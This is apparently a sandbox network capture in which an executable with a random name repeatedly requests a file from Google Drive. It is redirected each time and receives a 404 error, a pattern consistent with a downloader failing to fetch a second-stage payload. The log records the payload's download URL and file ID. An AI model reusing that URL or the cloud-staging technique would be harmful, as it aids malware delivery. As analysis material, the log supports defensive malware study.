                                                    2025-01-10 14:39:52 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:52 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:52 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-z2LhwlUzTch4ELdEt_ya1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    43 | 192.168.2.7 | 52228 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:53 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:53 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC42INTQcEMOkPrixOQ1TpM2Q_-W7xSQL9l_8_oNYOQkeKU8tftaJ_OhO9fnoeZBSfRTP0CnQYI
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:53 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-JElhuqk_mMgbZIpgf4Gk5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:53 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dkzlkAFuqEioEsOZWgichg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    44 | 192.168.2.7 | 52229 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:54 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:54 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:54 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-jjiRYZkvH-MsZ2z_GiPmCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    45 | 192.168.2.7 | 52230 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:55 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:56 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC4-Ffjb-ClqqjuqL-ctkK8AL2hXjDna6vXr_CNlT-URa_xi9qLsdfsZNk1W62B93ukubeQN7yU
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:55 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce-W002gmwOkydt7E2wVEkS3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:56 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FIJNhmT3rE99goI5swJqqA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    46 | 192.168.2.7 | 52231 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:56 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:57 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:57 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: script-src 'nonce-c80InAIqdrIRzE5nS5eg3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    47 | 192.168.2.7 | 52232 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:57 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:58 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgR6qA1sjjLWHzUZmSgtHyxUeISbuFVdvKDyrpHt_EdQUc6cpAbYJdZg6V6V86vfC7jyZDvzEpE
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:58 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-R34HUDyU8rT4i4KNzKOzYg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:58 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1Q5ryQUsVK9AEVR54r-W1A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    48 | 192.168.2.7 | 52233 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:59 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:59 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:59 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-70MP4T_qoe9-yfO1coyLow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    49 | 192.168.2.7 | 52234 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:00 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:00 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgR38k9ekxwDxSdsYR-3m1aY1A_jx5k62kG5pmCTOjq09a_O65wabBT-bFvZkMr9RjdR
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:00 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-VAEdNDbi0Lfe6pIvhAfwKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:00 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9jFuKPWM8NpqLPOHpEXYbA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    50 | 192.168.2.7 | 52235 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:40:01 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:01 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:01 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-CP0qdCmPtOQsndJWfNtJ9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
